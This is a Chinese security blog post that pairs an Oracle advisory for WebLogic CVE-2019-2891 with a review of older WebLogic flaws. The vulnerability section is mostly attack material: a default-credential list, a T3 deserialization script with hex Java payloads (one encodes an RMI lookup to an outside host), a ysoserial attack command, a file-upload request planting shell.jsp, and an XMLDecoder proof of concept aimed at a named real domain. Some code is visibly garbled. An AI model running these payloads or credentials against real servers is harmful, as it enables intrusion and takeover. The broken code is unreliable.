weblogic预警及历史漏洞

最新推荐文章于 2024-05-27 19:45:26 发布
最新推荐文章于 2024-05-27 19:45:26 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: WEB安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29647709/article/details/102615426
版权

简介

1、 Oracle WebLogic CVE-2019-2891 漏洞预警

2、WebLogic历史漏洞回顾

1.预警

Oracle 官方发布了 2019 年 10 月的严重补丁更新 CPU(Critical Patch Update),其中修复了存在于 WebLogic 中的一个高危漏洞(CVE-2019-2891)。

1.1预警描述

此漏洞为远程代码执行漏洞,基于全球使用该产品用户的数量和暴露在网上的端口情况,恶意攻击者可能会开发针对该漏洞的自动化攻击程序,实现漏洞利用成功后自动植入后门程序,并进一步释放矿工程序或是DDOS僵尸木马等恶意程序,从而影响到网站服务的正常提供。

1.2影响范围

CVE-2019-2890和CVE-2019-2891主要影响以下版本:

  • WebLogic Server 10.3.6.0
  • WebLogic Server 12.1.3.0
  • WebLogic Server 12.2.1.3

2.历史漏洞

2.1概述

Weblogic 历史相关漏洞:

控制台路径泄露:弱口令破解

SSRF 漏洞 :CVE-2014-4210

任意文件上传漏洞:CVE-2018-2894等

XML Decoder 反序列化漏洞 :CVE-2017-3506、CVE-2017-10271等

Java 反序列化漏洞 :CVE-2015-4852、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248等

2.2漏洞类型

0X00 Weblogic 弱口漏洞类

弱口令

常见弱口令
system:password
weblogic:weblogic
admin:secruity
joe:password
mary:password
system:sercurity
wlcsystem:wlcsystem
weblogic:Oracle@123

0X01 Java 反序列化类

Java 序列化与 Java 反序列化Java 序列化:即把 Java 对象转换为字节序列的过程 Java 反序列化:是指把字节序列恢复为 Java 对象的过程

相关历史漏洞简介

CVE-2015-4852:Weblogic 直接反序列化,是基于 Weblogic t3 协议引起远程代码执行的反序列化漏洞

CVE-2016-0638:Weblogic 直接反序列化,基于 Weblogic t3 协议引起远程代码执行的反序列化漏洞,漏洞实为 CVE-2015-4852 绕过 拜 Oracle 一直以来的黑名单修复方式所赐

CVE-2016-3510:基于 Weblogic t3 协议引起远程代码执行的反序列化漏洞

CVE-2017-3248:基于 Weblogic t3 协议引起远程代码执行的反序列化漏洞 属于 Weblogic JRMP 反序列化

CVE-2018-2628:基于 Weblogic t3 协议引起远程代码执行的反序列化漏洞 属于 Weblogic JRMP 反序列化

CVE-2018-2893:基于 Weblogic t3 协议引起远程代码执行的反序列化漏洞 实为 CVE-2018-2628 绕过

该漏洞涉及版本

10.3.6.0 12.1.3.0 12.2.1.2 12.2.1.3

漏洞检测利用

(1)利用现有的nmap脚本进行检测目标是否使用了T3协议

nmap -n -v -p 7001,目标地址 --script=weblogic-t3-info

(2)使用 Python 脚本针对目标进行探测,是否存在漏洞 Java 反序列化漏洞

# -*- coding: utf-8 -*-
import socket
import time
import re

VUL=['**********']#remote ip changed to :127.0.0.1
PAYLOAD=['aced00057372004d636f6d2e6265612e636f72652e72657061636b616765642e737072696e676672616d65776f726b2e7472616e73616374696f6e2e6a74612e4a74615472616e73616374696f6e4d616e616765724ef3ecfbb628982f0200085a001a616c6c6f77437573746f6d49736f6c6174696f6e4c6576656c735a001c6175746f6465746563745472616e73616374696f6e4d616e616765725a00196175746f646574656374557365725472616e73616374696f6e5a00146361636865557365725472616e73616374696f6e5a001f757365725472616e73616374696f6e4f627461696e656446726f6d4a6e64694c00167472616e73616374696f6e4d616e616765724e616d657400124c6a6176612f6c616e672f537472696e673b4c00267472616e73616374696f6e53796e6368726f6e697a6174696f6e52656769737472794e616d6571007e00014c0013757365725472616e73616374696f6e4e616d6571007e00017872005e636f6d2e6265612e636f72652e72657061636b616765642e737072696e676672616d65776f726b2e7472616e73616374696f6e2e737570706f72742e4162737472616374506c6174666f726d5472616e73616374696f6e4d616e6167657235f8d3063abc94c402000749000e64656661756c7454696d656f75745a001d6661696c4561726c794f6e476c6f62616c526f6c6c6261636b4f6e6c795a0024676c6f62616c526f6c6c6261636b4f6e50617274696369706174696f6e4661696c7572655a00186e65737465645472616e73616374696f6e416c6c6f7765645a0017726f6c6c6261636b4f6e436f6d6d69744661696c75726549001a7472616e73616374696f6e53796e6368726f6e697a6174696f6e5a001b76616c69646174654578697374696e675472616e73616374696f6e7870ffffffff00010100000000000000010101007070740032726d693a2f2f61646d696e3636362e667572746865726579657365632e667572746865726579652d7365632e636f6d2f6161']#remote ip:104.251.228.50
#PAYLOAD=['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea90b00000000000000000000000000000078']
VER_SIG=['\\$Proxy[0-9]+']

def t3handshake(sock,server_addr):
    sock.connect(server_addr)
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    time.sleep(1)
    a = sock.recv(1024)
    print(a)
    print 'handshake successful'

def buildT3RequestObject(sock,dport):
    data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
    data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd60000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1,data2,data3,data4]:
        sock.send(d.decode('hex'))
    time.sleep(2)
    print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))

def sendEvilObjData(sock,data):
    payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
    payload+=data
    payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
    sock.send(payload.decode('hex'))
    time.sleep(2)
    sock.send(payload.decode('hex'))
    res = ''
    try:
        while True:
            res += sock.recv(4096)
            time.sleep(0.1)
    except Exception as e:
        pass
    return res

def checkVul(res,server_addr,index):
    p=re.findall(VER_SIG[index], res, re.S)
    if len(p)>0:
        print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index])
    else:
        print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index])

def run(dip,dport,index):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整
    sock.settimeout(65)
    server_addr = (dip, dport)
    t3handshake(sock,server_addr)
    buildT3RequestObject(sock,dport)


if __name__=="__main__":
    dip = 'your ip'
    dport = 8008
    run(dip,dport,0)#    for i in range(0,len(VUL)):#        run(dip,dport,i)

之后利用反序列化攻击的工具ysoserial进行攻击

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]

0X02 任意文件上传类(CVE-2019-2628)为例

POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1
User-Agent: python-requests/2.18.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
username: weblogic
wl_request_type: app_upload
wl_upload_application_name: /../tmp/_WL_internal/bea_wls_internal/9j4dqk/war
password: Oracle@123
content-type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
archive: true
server_version: 10.3.6.0
wl_upload_delta: true
Content-Length: 197
Host: yourip:8008

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="shell.jsp"; filename="test.jsp"
Content-Type: false

 123 

------WebKitFormBoundary7MA4YWxkTrZu0gW--

0X03 XML Decoder 反序列化类与SSRF

SSRF(Server-Side Request Forgery),服务端请求伪造,是一种由攻击者构造形成由服务端发起请求的一个漏洞,一般情况下,SSRF 攻击的目标是从外部网络无法访问的内部系统。

涉及版本

10.0.2、10.3.6

实现步骤

(1)简单探测

#手工进行简单检测,在漏洞地址处,点击 Search 按钮,返回 “An error has occurred”
#如果不显示,可以使用脚本猜测 “ip_detect.py”
rt requests

headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Upgrade-Insecure-Requests': '1',
    'Content-Type': 'text/xml'
    }
def Webogic_XMLDecoder_poc(url):
    #url="http://192.168.XX.XX:7001"
    posturl=url+'/wls-wsat/CoordinatorPortType'
    data = '''
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
        <soapenv:Header>
            <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
                <java version="1.6.0" class="java.beans.XMLDecoder">
                    <object class="java.io.PrintWriter">
                        <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt</string><void method="println">
                        <string>xmldecoder_vul_test</string></void><void method="close"/>
                    </object>
                </java>
            </work:WorkContext>
        </soapenv:Header>
        <soapenv:Body/>
    </soapenv:Envelope>
    '''

    print (url)
    try:
        r=requests.post(posturl,data=data,headers=headers,timeout=5)
        geturl=url+"/wls-wsat/test.txt"
        print (geturl)
        check_result = requests.get(geturl,headers=headers,timeout=5)
        if 'xmldecoder_vul_test' in check_result.text:
            print ("[+]存在WebLogic WLS远程执行漏洞(CVE-2017-10271)")
    except:
        print ("[-]不存在WebLogic WLS远程执行漏洞(CVE-2017-10271)")

if __name__ == '__main__':
    url = "http://www.7089bat.top:7001"
    Webogic_XMLDecoder_poc(url)

2.3相关漏洞

漏洞名CVE严重性
BEA WebLogic Admin Console Cross Site Scripting VulnerabilityCVE-2005-1747high
BEA WebLogic Server And WebLogic Express Remote Denial of Service VulnerabilityCVE-2004-2424high
BEA WebLogic Server Apache Connector HTTP Version String Buffer Overflow VulnerabilityCVE-2008-3257high
BEA WebLogic Server Apache Connector HTTP Version String Buffer Overflow VulnerabilityCVE-2008-3257high
Oracle BEA WebLogic IIS connector JSESSIONID Stack Buffer Overflow VulnerabilityCVE-2008-5457high
Oracle BEA WebLogic Server Apache Connector Buffer Overflow VulnerabilityCVE-2008-5457medium
Oracle BEA Weblogic Server console-help.portal Cross-Site Scripting VulnerabilityCVE-2009-1975high
Oracle BEA WebLogic Server Plug-ins Certificate Buffer Overflow VulnerabilityCVE-2009-1016high
Oracle WebLogic Node Manager Command Execution Vulnerabilityhigh
Oracle WebLogic Remote Code Execution Evasion FoundCVE-2019-2729high
Oracle WebLogic Remote Code Execution VulnerabilityCVE-2018-2628,CVE-2018-2893,CVE-2018-3197,CVE-2018-3201,CVE-2018-3245critical
Oracle WebLogic Remote Code Execution VulnerabilityCVE-2018-3191critical
Oracle WebLogic Remote Diagnosis Assistant rda_tfa_hrs Command Injection VulnerabilityCVE-2018-2616medium
Oracle WebLogic Remote Diagnosis Assistant rda_tfa_ref_date Command Injection VulnerabilityCVE-2018-2615medium
Oracle Weblogic Remote Session Fixation VulnerabilityCVE-2010-4437high
Oracle WebLogic Server AbstractPlatformTransactionManager Insecure Deserialization VulnerabilityCVE-2018-3191critical
Oracle WebLogic Server Apache-Commons-FileUpload Library Insecure Deserialization VulnerabilityCVE-2013-2186critical
Oracle WebLogic Server File Upload VulnerabilityCVE-2019-2618high
Oracle WebLogic Server FileDistributionServlet Information Disclosure VulnerabilityCVE-2019-2615medium
Oracle Weblogic Server HTTP Cookie Buffer OverflowCVE-2008-5457high
Oracle WebLogic Server Java Deserialization VulnerabilityCVE-2016-3510,CVE-2016-0638critical
Oracle WebLogic Server Java Deserialization VulnerabilityCVE-2016-3510,CVE-2016-0638critical
Oracle WebLogic Server Node Manager Command Execution VulnerabilityCVE-2010-0073high
Oracle WebLogic Server Remote Code Execution VulnerabilityCVE-2018-3252critical
Oracle WebLogic Server UnicastRef Insecure Deserialization VulnerabilityCVE-2017-3248high
Oracle WebLogic Server Web Service Config Arbitrary File Upload VulnerabilityCVE-2018-2894high
Oracle WebLogic Server XML External Entity Injection VulnerabilityCVE-2019-2647high
Oracle WebLogic Server XXE VulnerabilityCVE-2018-3246critical
Oracle WebLogic WLS Security Component Remote Code Execution VulnerabilityCVE-2017-10271,CVE-2017-3506high
Oracle WebLogic wls-wsat Remote Code Execution VulnerabilityCVE-2019-2729critical
Oracle WebLogic wls9-async Remote Code Execution VulnerabilityCVE-2019-2725,CVE-2019-2729critical
Oracle Weblogic WsrmServerPayloadContext External Entity Injection VulnerabilityCVE-2019-2648,CVE-2019-2650,CVE-2019-2649high

在这里插入图片描述

参考链接

https://www.t00ls.net/viewthread.php?tid=51576&highlight=weblogic

tdcoming
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【技术推荐】WebLogic 反序列化漏洞深入分析
m0_73257876的博客
09-25 3130
WebLogic 漏洞存在较多的反序列化类和反序列化的途径,在使用黑名单防御手段下,攻击者只要找到新的反序列化触发点,就能造成新的危害。比如,你有一个类 A,类里面有个属性是类 B,这个时候,在反序列化的过程中,就会先反序列化类 A,之后在填充类 A 的过程中,继续反序列化类 B,类 B 在反序列化完成后,填充到类 A 中,同时整个过程都在一个流中操作,这个时候,只要还是 ObjectOutStream 的 read_value进行反序列化操作就不能饶过黑名单!
WebLogic SSRF 及漏洞修复
11-25
### WebLogic SSRF 及其漏洞修复方法 #### 一、背景介绍 WebLogic SSRF(Server Side Request Forgery)是一种网络安全漏洞,攻击者可以通过控制Web应用去发起针对内网或者外网的服务请求,实现对目标系统的攻击。...
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2018-2628/CVE-2023-21839复现)
rumil的博客
09-19 8045
WebLogic 存在远程代码执行漏洞CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。
Weblogic T3协议反序列化漏洞[CVE-2018-2628]
最新发布
流水不争先,争的是滔滔不绝
05-27 546
漏洞影响版本【10.3.6.0.0】,【12.1.3.0.0】,【12.2.1.2.0】,【12.2.1.3.0】
weblogic XML反序列化
weixin_48776804的博客
05-10 359
weblogic XML反序列化
weblogic反序列化介绍及环境搭建
遇事不决冲冲冲
05-08 3726
weblogic是一个常用的web中间件,它的反序列化漏洞也算是比较经典,而在weblogic里面其实反序列化漏洞大致分为两种,一个是基于T3协议的反序列化漏洞,一个是基于XML的反序列化漏洞,一个原因就是配置环境配了好长时间,这篇就当作专门介绍环境搭建了吧Cve-2017-3506Cve-2017-10271Cve-2019-2729Cve-2019-2725CVE-2015-4852CVE-2016-0638CVE-2016-3510CVE-2017-3248CVE-2018-2628 CVE-20
weblogic 反序列化漏洞补丁
07-05
CVE-2018-2628是WebLogic服务器中发现的一个严重反序列化漏洞,可能导致远程代码执行(RCE)风险,威胁到服务器的安全性。 该漏洞的根本原因在于WebLogic服务器在处理某些类型的请求时,未能正确验证反序列化的数据...
Weblogic反序列化漏洞补丁包
01-18
Weblogic反序列化漏洞补丁包是针对Oracle WebLogic Server中的一个严重安全问题而发布的修复程序。WebLogic Server是一款广泛使用的Java EE应用服务器,为企业级应用程序提供了一个强大的运行环境。然而,像许多复杂...
weblogic cmd命令漏洞检测
04-08
WebLogic CMD命令漏洞检测主要涉及的是Oracle WebLogic Server的安全性,这是一个广泛应用的企业级Java应用服务器。此漏洞利用了WebLogic服务器中的反序列化机制,允许攻击者通过精心构造的恶意输入来执行任意系统...
weblogic反序列化漏洞测试jar包
02-17
weblogic反序列化漏洞测试jar包 如涉及版权问题请与我联系
weblogic反序列化.zip
07-08
简单的日常weblogic 应用的反序列化漏洞补丁方法和临时整改方法
Weblogic全版本反序列化漏洞利用工具.jar
02-01
weblogic反序列化检测工具
WebLogic_EXP.jar WebLogic反序列化利用工具
10-31
WebLogic_EXP.jar WebLogic反序列化利用工具下载,作者rebyond。 使用环境 JDK1.8
Java反序列化漏洞利用工具(WebLogic&Jboss;)
10-10
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
WebLogic反序列化_CVE-2017-3248
09-06
WebLogic反序列化_CVE-2017-3248 java -jar weblogic_cmd.jar -C pwd -H 192.168.1.1 -P 7001 工具使用方法: -B Runtime Blind Execute Command maybe you should select os type -C (执行命令)Execute Command[need set] -dst path to dst file -H (执行主机)Remote Host[need set] -https enable https or tls -noExecPath custom execute path -os (操作系统类型)Os Type [windows,linux] -P (远程端口)Remote Port[need set] -shell enable shell module -src path to src file -T Payload Type[marshall, collection, streamMessageImpl] -U Uninstall rmi -upload enable upload a file
weblogic反序列化_如何让weblogic反序列化无迹可寻
weixin_39747511的博客
12-12 221
一背景2019年4月17日,国家信息安全漏洞共享平台(CNVD)收录了由中国民生银行股份有限公司报送的Oracle WebLogic wls9-async反序列化远程命令执行漏洞(CNVD-C-2019-48814)。攻击者利用该漏洞,可在未授权的情况下远程执行命令。目前,官方补丁尚未发布,漏洞细节未公开。二漏洞情况分析WebLogicServer是美国甲骨文(Oracle)公司开发的一...
weblogic反序列化
m0_67284865的博客
07-02 422
weblogic的两种反序列化:xml和wls
漏洞复现】1. WebLogic 反序列化漏洞(CVE-2019-2890)复现与分析
Zichel77的博客
03-21 1675
2019年10月15日,Oracle官方发布了2019年10月安全更新公告,其中包含了一个可造成RCE远程任意代码执行的高危漏洞漏洞编号为CVE-2019-2890。Weblogic在利用T3协议进行远程资源加载调用时,默认会进行黑名单过滤以保证反序列化安全。本漏洞绕过了Weblogic的反序列化黑名单,使攻击者可以通过T3协议对存在漏洞Weblogic组件实施远程攻击。
weblogic反序列化漏洞
08-03
Weblogic反序列化漏洞是指在利用T3协议进行远程资源加载调用时,攻击者可以绕过Weblogic的反序列化黑名单,通过T3协议对存在漏洞Weblogic组件实施远程攻击。这个漏洞可以导致攻击者执行远程代码,从而控制Weblogic...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值